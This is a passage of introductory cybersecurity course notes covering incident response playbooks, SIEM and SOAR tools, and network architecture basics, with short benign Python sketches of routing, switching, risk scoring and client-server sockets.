operations. During this phase, security professionals eliminate artifacts of the incident by removing
malicious code and mitigating vulnerabilities. Once they've exercised
due diligence, they can begin to restore the affected environment to a secure state. This is also
known as IT restoration.
The fifth phase is post-incident activity. This phase includes
documenting the incident, informing organizational leadership, and applying lessons
learned to ensure that an organization is better prepared to handle future incidents. Depending on
the severity of the incident, organizations can conduct a full-scale incident analysis to determine the
root cause of the incident and implement various updates or improvements to enhance its overall
security posture.
The sixth and final phase in an incident response playbook is coordination. Coordination involves
reporting incidents and sharing information throughout the incident response process, based on
the organization's established standards. Coordination is important for many reasons. It ensures
that organizations meet compliance requirements and it allows for coordinated response and
resolution. There are many ways security professionals may be alerted to an incident. You recently
learned about SIEM tools and how they collect and analyze data. They use this data to detect threats
and generate alerts, which can inform the security team of a potential incident. Then, when a
security analyst receives a SIEM alert, they can use the appropriate playbook to guide the response
process. SIEM tools and playbooks work together to provide a structured and efficient way of
responding to potential security incidents.
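The six phases above form an ordered sequence from preparation through coordination. As a minimal sketch (not from the course materials, and simplified in that coordination actually occurs throughout the process), the phases can be modeled as an ordered list that a script or analyst could use to track an incident's progress:

```python
# The six incident response playbook phases, in order. Note: in practice,
# coordination happens throughout the process; listing it last is a
# simplification for illustration.
PHASES = [
    "Preparation",
    "Detection and analysis",
    "Containment",
    "Eradication and recovery",
    "Post-incident activity",
    "Coordination",
]

def next_phase(current):
    """Return the phase that follows `current`, or None if none remain."""
    index = PHASES.index(current)
    return PHASES[index + 1] if index + 1 < len(PHASES) else None

print(next_phase("Containment"))   # Eradication and recovery
print(next_phase("Coordination"))  # None
```

Modeling the phases this way makes the ordering explicit: containment must come before eradication and recovery, which in turn precede post-incident activity.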
Playbook overview
A playbook is a manual that provides details about any operational action. Essentially, a playbook
provides a predefined and up-to-date list of steps to perform when responding to an incident.
Playbooks are accompanied by a strategy. The strategy outlines expectations of team members who are
assigned a task, and some playbooks also list the individuals responsible. The outlined expectations are
accompanied by a plan. The plan dictates how the specific task outlined in the playbook must be
completed.
Playbooks should be treated as living documents, which means that they are frequently updated by
security team members to address industry changes and new threats. Playbooks are generally managed
as a collaborative effort since security team members have different levels of expertise.
Updates are often made if:
● A failure is identified, such as an oversight in the outlined policies and procedures, or in the playbook itself.
● There is a change in industry standards, such as changes in laws or regulatory compliance.
● The cybersecurity landscape changes due to evolving threat actor tactics and techniques.
Types of playbooks
Playbooks sometimes cover specific incidents and vulnerabilities. These might include ransomware,
vishing, business email compromise (BEC), and other attacks previously discussed. Incident and
vulnerability response playbooks are very common, but they are not the only types of playbooks
organizations develop.
Each organization has a different set of playbook tools, methodologies, protocols, and procedures that
they adhere to, and different individuals are involved at each step of the response process, depending on
the country they are in. For example, incident notification requirements from government-imposed laws
and regulations, along with compliance standards, affect the content in the playbooks. These
requirements are subject to change based on where the incident originated and the type of data
affected.
Incident and vulnerability response playbooks
Incident and vulnerability response playbooks are commonly used by entry-level cybersecurity
professionals. They are developed based on the goals outlined in an organization’s business continuity
plan. A business continuity plan is an established path forward allowing a business to recover and
continue to operate as normal, despite a disruption like a security breach.
These two types of playbooks are similar in that they both contain predefined and up-to-date lists of
steps to perform when responding to an incident. Following these steps is necessary to ensure that you,
as a security professional, are adhering to legal and organizational standards and protocols. These
playbooks also help minimize errors and ensure that important actions are performed within a specific
timeframe.
When an incident, threat, or vulnerability occurs or is identified, the level of risk to the organization
depends on the potential damage to its assets. A basic formula for determining the level of risk is that risk
equals the likelihood of a threat multiplied by its potential impact on the organization's assets. For this
reason, a sense of urgency is essential. Following the steps
outlined in playbooks is also important if any forensic task is being carried out. Mishandling data can
easily compromise forensic data, rendering it unusable.
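The basic risk formula described above—the likelihood of a threat combined with its potential impact—can be sketched as a simple calculation. The 1-to-5 rating scale below is an assumption for illustration, not a standard from the course:

```python
# A hedged sketch of a basic risk calculation: risk = likelihood x impact.
# Both inputs are assumed ratings from 1 (low) to 5 (high).
def risk_score(likelihood, impact):
    """Return a simple risk score for prioritizing response efforts."""
    return likelihood * impact

print(risk_score(4, 5))  # 20 -- a likely threat against a high-impact asset
print(risk_score(1, 2))  # 2  -- an unlikely threat against a low-impact asset
```

Scoring risks this way lets a team rank incidents so that likely threats to critical assets are addressed first.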
Common steps included in incident and vulnerability playbooks include:
● Preparation
● Detection
● Analysis
● Containment
● Eradication
● Recovery from an incident
Additional steps include performing post-incident activities and coordinating efforts throughout the
investigation and incident and vulnerability response stages.
Key takeaways
It is essential to refine processes and procedures outlined in a playbook. With every documented
incident, cybersecurity teams need to consider what was learned from the incident and what
improvements should be made to handle incidents more effectively in the future. Playbooks create
structure and ensure compliance with the law.
Resources for more information
Incident and vulnerability response playbooks are only two examples of the many playbooks that an
organization uses. If you plan to work as a cybersecurity professional outside of the U.S., you may want
to explore the following resources:
● United Kingdom, National Cyber Security Center (NCSC) - Incident Management
● Australian Government - Cyber Incident Response Plan
● Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) - Vulnerability Handling and related guidelines
● Government of Canada - Ransomware Playbook
● Scottish Government - Playbook Templates
Use a playbook to respond to threats, risks, or vulnerabilities
In this video, we're going to revisit SIEM tools and how they're used alongside playbooks to reduce
organizational threats, risks, and vulnerabilities. An incident response playbook is a guide that helps
security professionals mitigate issues with a heightened sense of urgency, while maintaining
accuracy. Playbooks create structure, ensure compliance, and outline processes for communication
and documentation. Organizations may use different types of incident response playbooks
depending on the situation. For example, an organization may have specific playbooks for
addressing different types of attacks, such as ransomware, malware, distributed denial of service,
and more. To start, let's discuss how a security analyst might use a playbook to address a SIEM
alert, like a potential malware attack. In this situation, a playbook is invaluable for guiding an
analyst through the necessary actions to properly address the alert.
The first action in the playbook is to assess the alert. This means determining if the alert is valid by
identifying why the alert was generated by the SIEM. This can be done by analyzing log data and
related metrics.
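The assessment step above can be sketched in a few lines: an analyst (or a script) checks whether the raw log data actually contains the indicator that triggered the SIEM alert. The log format and indicator string below are invented for illustration:

```python
# A toy sketch of assessing a SIEM alert: confirm the log data contains the
# indicator the alert was generated for. Log lines and filename are made up.
alert_indicator = "malware.exe"
log_lines = [
    "2023-11-01 09:12:01 host01 process_start notepad.exe",
    "2023-11-01 09:12:44 host01 process_start malware.exe",
]

matching = [line for line in log_lines if alert_indicator in line]
print(len(matching))  # 1 -- a matching event exists, so the alert looks valid
```

If no matching events were found, the analyst might classify the alert as a false positive instead of proceeding to containment.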
Next, the playbook outlines the actions and tools to use to contain the malware and reduce further
damage. For example, this playbook instructs the analyst to isolate, or disconnect, the infected
network system to prevent the malware from spreading into other parts of the network.
After containing the incident, step three of the playbook describes ways to eliminate all traces of the
incident and restore the affected systems back to normal operations. For example, the playbook
might instruct the analyst to restore the impacted operating system, then restore the affected data
using a clean backup, created before the malware outbreak.
Finally, once the incident has been resolved, step four of the playbook instructs
the analyst to perform various post-incident activities and coordination efforts with the security
team. Some actions include creating a final report to communicate the security
incident to stakeholders, or reporting the incident to the appropriate authorities, like the U.S.
Federal Bureau of Investigation or other agencies that investigate cybercrimes. This is just one
example of how you might follow the steps in a playbook, since organizations develop
their own internal procedures for addressing security incidents. What's most important to
understand is that playbooks provide a consistent process for security professionals to follow. Note
that playbooks are living documents, meaning the security team will make frequent changes,
updates, and improvements to address new threats and vulnerabilities. In addition, organizations
learn from past security incidents to improve their security posture, refine policies and procedures,
and reduce the likelihood and impact of future incidents. Then, they update their playbooks
accordingly. As an entry-level security analyst, you may be required to use playbooks frequently,
especially when monitoring networks and responding to incidents. Understanding why playbooks
are important and how they can help you achieve your working objectives will help ensure your
success within this field.
Playbooks, SIEM tools, and SOAR tools
Previously, you learned that security teams encounter threats, risks, vulnerabilities, and incidents on a
regular basis and that they follow playbooks to address security-related issues. In this reading, you will
learn more about playbooks, including how they are used in security information and event
management (SIEM) and security orchestration, automation, and response (SOAR).
Playbooks and SIEM tools
Playbooks are used by cybersecurity teams in the event of an incident. Playbooks help security teams
respond to incidents by ensuring that a consistent list of actions is followed in a prescribed way,
regardless of who is working on the case. Playbooks can be very detailed and may include flow charts
and tables to clarify what actions to take and in which order. Playbooks are also used for recovery
procedures in the event of a ransomware attack. Different types of security incidents have their own
playbooks that detail who should take what action and when.
Playbooks are generally used alongside SIEM tools. If, for example, unusual user behavior is flagged by a
SIEM tool, a playbook provides analysts with instructions about how to address the issue.
Playbooks and SOAR tools
Playbooks are also used with SOAR tools. SOAR tools are like SIEM tools in that they are used for threat
monitoring. SOAR is a piece of software used to automate repetitive tasks generated by tools such as a
SIEM or managed detection and response (MDR). For example, if a user attempts to log into their
computer too many times with the wrong password, a SOAR will automatically block their account to
stop a possible intrusion. Then, analysts would refer to a playbook to take steps to resolve the issue.
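The failed-login example above can be sketched as a simple automation rule. This is assumed logic for illustration, not any specific SOAR product's API, and the threshold and usernames are made up:

```python
# A simplified SOAR-style rule: automatically flag accounts for lockout once
# failed login attempts reach a threshold, before an analyst investigates.
MAX_FAILED_ATTEMPTS = 3

def accounts_to_lock(failed_attempts):
    """Given {username: failed_attempt_count}, return accounts to auto-lock."""
    return sorted(user for user, count in failed_attempts.items()
                  if count >= MAX_FAILED_ATTEMPTS)

print(accounts_to_lock({"amal": 1, "priya": 5, "lee": 3}))  # ['lee', 'priya']
```

The automation handles the repetitive part (detecting and blocking), while the playbook guides the human analyst through investigating and resolving the underlying issue.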
Key takeaways
What is most important to know is that playbooks, also sometimes referred to as runbooks, provide
detailed actions for security teams to take in the event of an incident. Knowing exactly who needs to do
what and when can help reduce the impact of an incident and reduce the risk of damage to an
organization’s critical assets.
Glossary terms from module 4
Terms and definitions from Course 2, Module 4
Incident response: An organization’s quick attempt to identify an attack, contain the damage, and correct
the effects of a security breach
Playbook: A manual that provides details about any operational action
Congratulations on completing this course! Let's recap what we've covered so far. First, we
reviewed CISSP's eight security domains and focused on threats, risks, and vulnerabilities to
business operations. Then, we explored security frameworks and controls, and how they're a
starting point for creating policies and processes for security management. This included a
discussion of the CIA triad, NIST frameworks, and security design principles, and how they
benefit the security community. This was followed by a discussion about how frameworks, controls,
and principles are related to security audits. We also explored basic security tools, such as SIEM
dashboards, and how they are used to protect business operations. And finally, we covered how to
protect assets and data by using playbooks. As a security analyst, you may be working on multiple
tasks at once. Understanding the tools you have at your disposal, and how to use them, will elevate
your knowledge in the field while helping you successfully accomplish your everyday tasks.
Course 3 – Network Architecture
Learning Objectives
● Define types of networks
● Describe physical components of a network
● Understand how the TCP/IP model provides a framework for network communication
● Explain how data is sent and received over a network
● Explain network architecture
Now we'll explore one of those domains further: networks. It's important to secure networks
because network-based attacks are growing in both frequency and complexity. Hi there! My name is
Chris, and I'm the Chief Information Security Officer for Google Fiber. I'm excited to be your
instructor for this course! I've been working in network security and engineering for over 20 years,
and I'm looking forward to sharing some of my knowledge and experience with you. This course
will help you understand the basic structure of a network (also referred to as network architecture)
and commonly used network tools. You'll also learn about network operations
and explore some basic network protocols. Next, you'll learn about common network attacks and
how network intrusion tactics can present a threat to a network. Finally, the course will provide an
overview of security hardening practices and how you might use them
to help secure a network.
Course 3 overview
Hello and welcome to Connect and Protect: Networks and Network Security, the third course in the
Google Cybersecurity Certificate. You’re on an exciting journey!
By the end of this course, you will develop a greater understanding of network architecture, operations,
intrusion tactics, common types of network vulnerabilities and attacks, and how to secure networks.
You’ll also be introduced to common network protocols, firewalls, virtual private networks (VPNs), and
system hardening practices.
Certificate program progress
The Google Cybersecurity Certificate program has eight courses. Connect and Protect: Networks and
Network Security is the third course.
1. Foundations of Cybersecurity — Explore the cybersecurity profession, including significant
events that led to the development of the cybersecurity field and its continued importance to
organizational operations. Learn about entry-level cybersecurity roles and responsibilities.
2. Play It Safe: Manage Security Risks — Identify how cybersecurity professionals use frameworks
and controls to protect business operations, and explore common cybersecurity tools.
3. Connect and Protect: Networks and Network Security — (current course) Gain an understanding
of network-level vulnerabilities and how to secure networks.
4. Tools of the Trade: Linux and SQL — Explore foundational computing skills, including
communicating with the Linux operating system through the command line and querying
databases with SQL.
5. Assets, Threats, and Vulnerabilities — Learn about the importance of security controls and
developing a threat actor mindset to protect and defend an organization’s assets from various
threats, risks, and vulnerabilities.
6. Sound the Alarm: Detection and Response — Understand the incident response lifecycle and
practice using tools to detect and respond to cybersecurity incidents.
7. Automate Cybersecurity Tasks with Python — Explore the Python programming language and
write code to automate cybersecurity tasks.
8. Put It to Work: Prepare for Cybersecurity Jobs — Learn about incident classification, escalation,
and ways to communicate with stakeholders. This course closes out the program with tips on
how to engage with the cybersecurity community and prepare for your job search.
Course 3 content
Module 1: Network architecture
You'll be introduced to network security and how it relates to ongoing security threats and
vulnerabilities. You'll also learn about network architecture and mechanisms used to secure a network.
Module 2: Network operations
You will explore network protocols and how network communication can introduce vulnerabilities. In
addition, you'll learn about common security measures, like firewalls, that help network operations
remain safe and reliable.
Module 3: Secure against network intrusions
You will understand types of network attacks and techniques used to secure compromised network
systems and devices. You'll explore the many ways that malicious actors exploit vulnerabilities in
network infrastructure and how cybersecurity professionals identify and close potential loopholes.
Module 4: Security hardening
You will become familiar with network hardening practices that strengthen network systems. You'll
learn how security hardening helps defend against malicious actors and intrusion methods. You'll also
learn how to use security hardening to address the unique security challenges posed by cloud
infrastructures.
Module 1 – Network Architecture/Design
Before you can understand the importance of securing a network, you need to know what a
network is. A network is a group of connected devices. At home, the devices connected to
your network might be your laptop, cell phones, and smart devices, like your refrigerator or air
conditioner. In an office, devices like workstations, printers, and servers all connect to the network.
The devices on a network can communicate with each other over network cables, or wireless
connections. Networks in your home and office can communicate with networks in other locations,
and the devices on them. Devices need to find each other on a network to establish
communications. These devices will use unique addresses, or identifiers, to locate each other. The
addresses ensure that communication happens with the right device. These identifiers are called IP
and MAC addresses. Devices can communicate on two types of networks: a local area network, also
known as a LAN, and a wide area network, also known as a WAN. A local area network, or LAN,
spans a small area like an office building, a school, or a home. For example, when a personal device
like your cell phone or tablet connects to the Wi-Fi in your house, it joins a LAN. The LAN then
connects to the internet. A wide area network or WAN spans a large geographical area like a city,
state, or country. You can think of the internet as one big WAN. An employee of a company in San
Francisco can communicate and share resources with another employee in Dublin, Ireland over the
WAN.
Emmanuel: Useful skills for network security
My name is Emmanuel and I am an offensive security engineer at Google. For offensive security, my
job is to simulate adversaries and threats that are targeting
various companies and I look at defending how we can protect Google's
infrastructure. I make it harder to hack Google by actually
hacking Google. The technical skills that I use include a lot of programming, as well as learning about
operational and platform security. Knowing how these
computers work, what is under the hood, and understanding the components that create this
infrastructure. An entry-level cybersecurity analyst would look at using command lines, log parsing,
and network traffic analysis in their
everyday scope of work. Command line allows you to interact with various levels of
your operating system, whether it's the low-level things like the memory and the kernel, or if it's
high-level things like the applications and the programs that you're running
on your computer. With log parsing, there are going to be times when you
may need to figure out and debug what is going on in your program or application, and
these logs are there to help you and support you in finding the root issue and
then resolving it from there. With network traffic analysis, there may be times when
you need to figure out: why is my internet going slow? Why is traffic not being routed to the
appropriate destination? What can I do to ensure that my network
is up and running? Network traffic analysis is looking at network across various application
and network layers and seeing what that traffic is doing, how we can secure that traffic, as well as
identify any vulnerabilities and concerns. In the context of security, for
me, I look at: are passwords being leaked in the traffic that's being sent across the
network? Are infrastructures being secured? Are firewalls configured, and
configured safely? One skill that has continued to grow with me in my current role has been
communicating effectively with product teams and engineers: identifying an issue
that is influencing or affecting the business, and communicating with those teams
effectively to fix it. Being able to take on these many hats and explain things with the
right business approach ensures that the issues that I do find in my work are not only identified
but also fixed. My advice to folks who are taking this certificate would be to take things apart,
feel uncomfortable, learn and grow, and find opportunities to learn
and understand how things work, and that skill set will benefit you for the
remainder of your journey.
Network Tools
In this video, you'll learn about the common devices that make up a network. Let's get started. A
hub is a network device that broadcasts information to every device on the network. Think of a hub
like a radio tower that broadcasts a signal to any radio tuned to the correct frequency. Another
network device is a switch. A switch makes connections between specific devices on a network by
sending and receiving data between them. A switch is more intelligent than a hub. It only passes
data to the intended destination. This makes switches more secure than hubs, and enables them to
control the flow of traffic and improve network performance. Another device that we'll discuss is a
router. A router is a network device that connects multiple networks together. For example, if a
computer in one network wants to send information to a tablet on another network, then the
information will be transferred as follows: First, the information travels from the computer to the
router. Then, the router reads the destination address, and forwards the data to the intended
network's router. Finally, the receiving router directs that information
to the tablet. Finally, let's discuss modems. A modem is a device that connects your router to the
internet, and brings internet access to the LAN. For example, if a computer from
one network wants to send information to a device on a network in a different geographic location,
it would be transferred as follows: The computer would send information to the router, and the
router would then transfer the information through the modem to the internet. The intended
recipient's modem receives the information, and transfers it to the router. Finally, the recipient's
router forwards that information to the destination device. Network tools such as hubs, switches,
routers, and modems are physical devices. However, many functions performed by these physical
devices can be completed by virtualization tools. Virtualization tools are pieces of software that
perform network operations. Virtualization tools carry out operations that would normally be
completed by a hub, switch, router, or modem, and they are offered by
Cloud service providers. These tools provide opportunities for cost savings and scalability. You'll
learn more about them later in the certificate program. Now you've explored some common devices
that make up a network. Coming up, you're going to learn more about cloud computing, and how
networks can be designed using cloud services.
Network components, devices, and diagrams
In this section of the course, you will learn about network architecture.
Once you have a foundational understanding of network architecture, sometimes referred to as network
design, you will learn about security vulnerabilities inherent in all networks and how malicious actors
attempt to exploit them. In this reading, you will review network devices and connections and
investigate a simple network diagram similar to those used every day by network security professionals.
Essential tasks of a security analyst include setting up the tools, devices, and protocols used to observe
and secure network traffic.
Devices on a network
Network devices are the devices that maintain information and services for users of a network. These
devices connect over wired and wireless connections. After establishing a connection to the network,
the devices send data packets. The data packets provide information about the source and the
destination of the data.
Devices and desktop computers
Most internet users are familiar with everyday devices, such as personal computers, laptops, mobile
phones, and tablets. Each device and desktop computer has a unique MAC address and IP address, which
identify it on the network, and a network interface that sends and receives data packets. These devices
can connect to the network via a hard wire or a wireless connection.
Firewalls
A firewall is a network security device that monitors traffic to or from your network. Firewalls can also
restrict specific incoming and outgoing network traffic. The organization configures the security rules.
Firewalls often reside between the secured and controlled internal network and the untrusted network
resources outside the organization, such as the internet.
Servers
Servers provide a service for other devices on the network. The devices that connect to a server are
called clients. The following graphic outlines this model, which is called the client-server model. In this
model, clients send requests to the server for information and services. The server performs the
requests for the clients. Common examples include DNS servers that perform domain name lookups for
internet sites, file servers that store and retrieve files from a database, and corporate mail servers that
organize mail for a company.
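The request/response pattern of the client-server model can be sketched in a few lines of Python. This is a minimal illustration, assuming a simple echo-style service on the loopback interface; real servers such as DNS, file, or mail servers follow the same pattern at a much larger scale.

```python
import socket
import threading

def run_server(server_sock):
    """The server side: accept a client, read its request, perform it."""
    conn, _ = server_sock.accept()            # wait for a client connection
    request = conn.recv(1024)                 # read the client's request
    conn.sendall(b"response to: " + request)  # respond to the request
    conn.close()

# Start a tiny server on the loopback interface.
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(("127.0.0.1", 0))                 # port 0: let the OS pick a free port
server.listen(1)
port = server.getsockname()[1]
threading.Thread(target=run_server, args=(server,), daemon=True).start()

# The client side: connect, send a request, receive the server's response.
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(("127.0.0.1", port))
client.sendall(b"lookup example.com")
reply = client.recv(1024)
client.close()
print(reply.decode())
```

The key idea is the division of roles: the client initiates requests, and the server waits for and fulfills them.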
Cloud networks
Companies have traditionally owned their network devices, and kept them in their own office buildings.
But now, a lot of companies are using third-party
providers to manage their networks. Why? Well, this model helps companies save
money while giving them access to more network resources. The growth of cloud computing is
helping many companies reduce costs and streamline their network operations. Cloud computing is the
practice of using remote servers, applications, and network services that are hosted on the internet
instead of on local physical devices. Today, the number of businesses that use
cloud computing is increasing every year, so it's important to understand how cloud
networks function and how to secure them. Cloud providers offer an alternative
to traditional on-premise networks, and allow organizations to have the benefits
of the traditional network without storing the devices and managing
the network on their own. A cloud network is a collection of servers
or computers that stores resources and data in a remote data center that
can be accessed via the internet. Because companies don't house
the servers at their physical location, these servers are referred
to as being "in the cloud". Traditional networks host web servers from
a business in its physical location. However, cloud networks are different from
traditional networks because they use remote servers, which
allow online services and web applications to be used
from any geographic location. Cloud security will become increasingly
relevant to many security professionals as more organizations migrate
to cloud services. Cloud service providers offer cloud
computing to maintain applications. For example,
they provide on-demand storage and processing power that their
customers pay for only as needed. They also provide business and web analytics that organizations can use
to monitor their web traffic and sales. With the transition to cloud networking,
I have witnessed an overlap of identity-based security on top of the more
traditional network-based solutions. This meant that my focus needed to be
on verifying both where the traffic is coming from and
the identity that is coming with it. More organizations are moving their network
services to the cloud to save money and simplify their operations. As this trend has grown, cloud
security has become a significant
aspect of network security.
Hubs and switches
Hubs and switches both direct traffic on a local network. A hub is a device that provides a common point
of connection for all devices directly connected to it. Hubs additionally repeat all information out to all
ports. From a security perspective, this makes hubs vulnerable to eavesdropping. For this reason, hubs
are not used as often on modern networks; most organizations use switches instead.
A switch forwards packets between devices directly connected to it. It maintains a MAC address table
that matches MAC addresses of devices on the network to port numbers on the switch and forwards
incoming data packets according to the destination MAC address.
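The MAC address table described above can be sketched as a simple lookup. This is an illustrative sketch with made-up addresses, assuming a pre-populated table; a real switch learns these mappings from the source addresses of incoming frames.

```python
# Simplified model of a switch's MAC address table: it maps the MAC
# addresses of connected devices to the switch port they are on.
mac_table = {
    "aa:bb:cc:00:00:01": 1,   # device on port 1
    "aa:bb:cc:00:00:02": 2,   # device on port 2
    "aa:bb:cc:00:00:03": 3,   # device on port 3
}

def forward(dest_mac, all_ports=(1, 2, 3, 4)):
    """Return the port(s) a frame should be sent out of."""
    if dest_mac in mac_table:
        return [mac_table[dest_mac]]   # known destination: one port only
    return list(all_ports)             # unknown destination: flood all ports

print(forward("aa:bb:cc:00:00:02"))    # [2]
print(forward("aa:bb:cc:ff:ff:ff"))    # unknown -> flooded to every port
```

This is also why switches are more secure than hubs: a frame for a known destination reaches only one port, instead of being repeated to every device.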
Routers
Routers sit between networks and direct traffic, based on the IP address of the destination network. The
IP address of the destination network is contained in the IP header. The router reads the header
information and forwards the packet to the next router on the path to the destination. This continues
until the packet reaches the destination network. Routers can also include a firewall feature that allows
or blocks incoming traffic based on information in the transmission. This stops malicious traffic from
entering the private network and damaging the local area network.
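The forwarding decision a router makes can be sketched using Python's standard `ipaddress` module. This is a hedged illustration, with made-up networks and next-hop names: the router compares the packet's destination IP against its routing table and forwards it along the most specific (longest-prefix) matching route.

```python
import ipaddress

# An illustrative routing table: (destination network, next hop).
routing_table = [
    (ipaddress.ip_network("10.0.0.0/8"),  "router-A"),
    (ipaddress.ip_network("10.1.0.0/16"), "router-B"),
    (ipaddress.ip_network("0.0.0.0/0"),   "default-gateway"),
]

def next_hop(dest_ip):
    """Pick the next hop using longest-prefix matching."""
    dest = ipaddress.ip_address(dest_ip)
    matches = [(net, hop) for net, hop in routing_table if dest in net]
    # The most specific route (longest prefix) wins.
    net, hop = max(matches, key=lambda m: m[0].prefixlen)
    return hop

print(next_hop("10.1.2.3"))   # matches 10.1.0.0/16 -> router-B
print(next_hop("10.9.9.9"))   # matches 10.0.0.0/8  -> router-A
print(next_hop("8.8.8.8"))    # only the default route matches
```

Each router along a packet's path repeats this decision until the packet reaches its destination network.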
Modems and wireless access points
Modems
Modems usually interface with an internet service provider (ISP). ISPs provide internet connectivity via
telephone lines, coaxial cables, fiber-optic cables, or satellites. Modems receive transmissions from the
internet and translate them into digital signals that can be understood by the devices on the network.
Usually, modems connect to a router that takes the decoded transmissions and sends them on to the
local network.
Note: Enterprise networks used by large organizations to connect their users and devices often use
other broadband technologies to handle high-volume traffic, instead of using a modem.
Wireless access point
A wireless access point sends and receives digital signals over radio waves, creating a wireless network.
Devices with wireless adapters connect to the access point using Wi-Fi. Wi-Fi refers to a set of standards
that are used by network devices to communicate wirelessly. Wireless access points and the devices
connected to them use Wi-Fi protocols to send data through radio waves, where it is passed on to routers
and switches and directed along the path to its final destination.
Using network diagrams as a security analyst
Network diagrams allow network administrators and security personnel to imagine the architecture and
design of their organization’s private network.
Network diagrams are topographical maps that show the devices on the network and how they connect.
Network diagrams use small representative graphics to portray each network device and dotted lines to
show how each device connects to the other. Security analysts use network diagrams to learn about
network architecture and how to design networks.
Key takeaways
In the client-server model, the client requests information and services from the server, and the server
performs the requests for the clients. Network devices include routers, workstations, servers, hubs,
switches, and modems. Security analysts use network diagrams to visualize network architecture.
Resources
Google Cloud Networking Overview
Cloud computing and software-defined
networks
In this section of the course, you’ve been learning the basic architecture of networks. You’ve learned
about how physical network devices like workstations, servers, routers, and switches connect to each
other to create a network. Networks may cover small geographical areas, as is the case in a local area
network (LAN). Or they may span a large geographic area, like a city, state, or country, as is the case in a
wide area network (WAN). You also learned about cloud networks and how cloud computing has grown
in recent years.
In this reading, you will further examine the concepts of cloud computing and cloud networking. You’ll
also learn about hybrid networks and software-defined networks, as well as the benefits they offer. This
reading will also cover the benefits of hosting networks in the cloud and why cloud-hosting is beneficial
for large organizations.
Computing processes in the cloud
Traditional networks are called on-premise networks, which means that all of the devices used for
network operations are kept at a physical location owned by the company, like in an office building, for
example. Cloud computing, however, refers to the practice of using remote servers, applications, and
network services that are hosted on the internet instead of at a physical location owned by the company.
A cloud service provider (CSP) is a company that offers cloud computing services. These companies own
large data centers in locations around the globe that house millions of servers. Data centers provide
technology services, such as storage, and compute at such a large scale that they can sell their services to
other companies for a fee. Companies can pay for the storage and services they need and consume them
through the CSP’s application programming interface (API) or web console.
CSPs provide three main categories of services:
● Software as a service (SaaS) refers to software suites operated by the CSP that a company can
use remotely without hosting the software.
● Infrastructure as a service (IaaS) refers to the use of virtual computer components offered by the
CSP. These include virtual containers and storage that are configured remotely through the
CSP’s API or web console. Cloud-compute and storage services can be used to operate existing
applications and other technology workloads without significant modifications. Existing
applications can be modified to take advantage of the availability, performance, and security
features that are unique to cloud provider services.
● Platform as a service (PaaS) refers to tools that application developers can use to design custom
applications for their company. Custom applications are designed and accessed in the cloud and
used for a company’s specific business needs.
Hybrid cloud environments
When organizations use a CSP’s services in addition to their on-premise computers, networks, and
storage, it is referred to as a hybrid cloud environment. When organizations use more than one CSP, it is
called a multi-cloud environment. The vast majority of organizations use hybrid cloud environments to
reduce costs and maintain control over network resources.
Software-defined networks
CSPs offer networking tools similar to the physical devices that you have learned about in this section of
the course. Next, you’ll review software-defined networking in the cloud. Software-defined networks
(SDNs) are made up of virtual network devices and services. Just like CSPs provide virtual computers,
many SDNs also provide virtual switches, routers, firewalls, and more. Most modern network hardware
devices also support network virtualization and software-defined networking. This means that physical
switches and routers use software to perform packet routing. In the case of cloud networking, the SDN
tools are hosted on servers located at the CSP’s data center.
Benefits of cloud computing and software-defined networks
Three of the main reasons that cloud computing is so attractive to businesses are reliability, decreased
cost, and increased scalability.
Reliability
Reliability in cloud computing is based on how available cloud services and resources are, how secure
connections are, and how often the services are effectively running. Cloud computing allows employees
and customers to access the resources they need consistently and with minimal interruption.
Cost
Traditionally, companies have had to provide their own network infrastructure, at least for internet
connections. This meant there could be potentially significant upfront costs for companies. However,
because CSPs have such large data centers, they are able to offer virtual devices and services at a
fraction of the cost required for companies to install, patch, upgrade, and manage the components and
software themselves.
Scalability
Another challenge that companies face with traditional computing is scalability. When organizations
experience an increase in their business needs, they might be forced to buy more equipment and
software to keep up. But what if business decreases shortly after? They might no longer have the
business to justify the cost incurred by the upgraded components. CSPs reduce this risk by making it
easy to consume services in an elastic utility model as needed. This means that companies only pay for
what they need when they need it.
Changes can be made quickly through the CSP's API or web console, much more quickly than if
network technicians had to purchase their own hardware and set it up. For example, if a company needs
to protect against a threat to their network, web application firewalls (WAFs), intrusion
detection/protection systems (IDS/IPS), or L3/L4 firewalls can be configured quickly whenever
necessary, leading to better network performance and security.
Key takeaways
In this reading, you learned more about cloud computing and cloud networking. You learned that CSPs
are companies that own large data centers that house millions of servers in locations all over the globe
and then provide modern technology services, including compute, storage, and networking, through the
internet. SDNs are an approach to network management. SDNs enable dynamic, programmatically
efficient network configurations to improve network performance and monitoring. This makes it more
like cloud computing than traditional network management. Organizations can improve reliability, save
costs, and scale quickly by using CSPs to provide networking services instead of building and
maintaining their own network infrastructure.
Resources for more information
For more information about cloud computing and the services offered, you can review Google Cloud
(GC).
Network Communication
Networks help organizations communicate and connect. But communication makes network
attacks more likely because it gives a malicious actor an opportunity to take
advantage of vulnerable devices and unprotected networks. Communication over a network
happens when data is transferred from one point to another. Pieces of data are typically
referred to as data packets. A data packet is a basic unit of information that travels from one device
to another within a network. When data is sent from one device to another across a network, it is
sent as a packet that contains information about where the packet is going, where it's coming from,
and the content of the message. Think about data packets like
a piece of physical mail. Imagine you want to send a letter to a friend. The envelope will need to
have the address where you want the letter to go and your return address. Inside the envelope is a
letter that contains the message that you want your friend to read. A data packet is very
similar to a physical letter. It contains a header that includes the internet protocol address, the IP
address, and the media access control, or MAC, address of the destination device. It also includes a
protocol number that tells the receiving device what to do with the information in the packet. Then
there's the body of the packet, which contains the message that needs to be transmitted to the
receiving device. Finally, at the end of the packet, there's a footer, similar to a signature on a letter,
the footer signals to the receiving device that the packet is finished. The movement of data packets
across a network can provide an indication of how well the network is performing. Network
performance can be measured by bandwidth. Bandwidth refers to the amount of data a device
receives every second. You can calculate bandwidth by dividing the quantity of data by the time in
seconds. Speed refers to the rate at which data packets are received or downloaded. Security
personnel are interested in network bandwidth and speed because if either are irregular, it could
be an indication of an attack. Packet sniffing is
the practice of capturing and inspecting data packets across the network. Communication on the
network is important for sharing resources and data because it allows organizations
to function effectively. Coming up, you'll learn more about the protocols to support network
communication.
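The packet structure and the bandwidth calculation described above can be sketched in Python. This is an illustrative model, with made-up addresses and values; real packet headers contain many more fields.

```python
from dataclasses import dataclass

# An illustrative model of a data packet: a header with addressing
# information, a body with the message, and a footer signaling the end.
@dataclass
class Header:
    source_ip: str
    destination_ip: str
    destination_mac: str
    protocol: int          # tells the receiver what to do with the packet

@dataclass
class Packet:
    header: Header
    body: bytes            # the message being transmitted
    footer: bytes          # signals that the packet is finished
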